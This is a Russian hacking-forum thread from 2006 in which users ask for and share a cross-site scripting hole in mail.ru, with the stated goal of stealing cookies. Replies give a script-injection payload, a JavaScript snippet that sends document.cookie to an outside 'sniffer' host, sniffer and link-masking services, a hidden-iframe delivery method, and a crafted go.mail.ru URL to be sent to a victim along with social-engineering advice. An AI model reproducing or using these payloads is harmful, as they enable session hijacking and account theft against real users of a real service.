Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.05.2006, 20:05
|
|
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613
Репутация:
25
|
|
Xss на mail.ru
Подкиньте пожалуста Xss на mail.ru зарание спасибо=)
|
|
|
25.05.2006, 20:33
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131
Репутация:
774
|
|
__________________
Завтра будет.Лучше.
|
|
|
|
25.05.2006, 20:36
|
|
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613
Репутация:
25
|
|
Профиксили уже =(
|
|
|
|
25.05.2006, 20:40
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131
Репутация:
774
|
|
Какое пофиксили!? Пробелы все в ссылке убери.
__________________
Завтра будет.Лучше.
|
|
|
|
25.05.2006, 21:10
|
|
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613
Репутация:
25
|
|
Go0o$E спасибо объясните плиз как её использовать ?? чтобы украсть куки
|
|
|
|
25.05.2006, 22:21
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
Для ознакомления:
https://forum.antichat.ru/thread18719.html
Чтобы куки украсть достаточно в уязвимом параметре написать:
Код:
<srcipt src=http://site.ru/js.js></script>
В самом файле js.js
Код:
img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;
Этот способ хорош тем, что работает даже там, где фильтруються ковычки.
Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например
Код:
<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">
Что не понятно - спрашивай. |
|
|
|
25.05.2006, 22:59
|
|
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613
Репутация:
25
|
|
Green_Bear в спасибо огромное)) я уж думал что ппц
|
|
|
|
30.05.2006, 00:37
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
А как же это:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код,
заблокированный автоматической системой безопасности.
iframe - неработает, думаю прокатить тока не в майл ру, а напрример на гмайл ит.д.
|
|
|
|
30.05.2006, 08:14
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
А как же это:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код,
заблокированный автоматической системой безопасности.
iframe - неработает, думаю прокатить тока не в майл ру, а напрример на гмайл ит.д.
Додумался, я дал пример использования пассивной ксс, а не в теле письма его присылать 
|
|
|
|
30.05.2006, 15:01
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
em00s7, ты должен отослать тому челу, которого хочешь взломать такую ссылку:
Код:
http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25%20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%%20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E
Ну и применить СИ, чтобы он её открыл.
Что делать с http://site.ru/js.js, объяснил Green_Bear.
Последний раз редактировалось *Van*; 30.05.2006 в 15:03..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
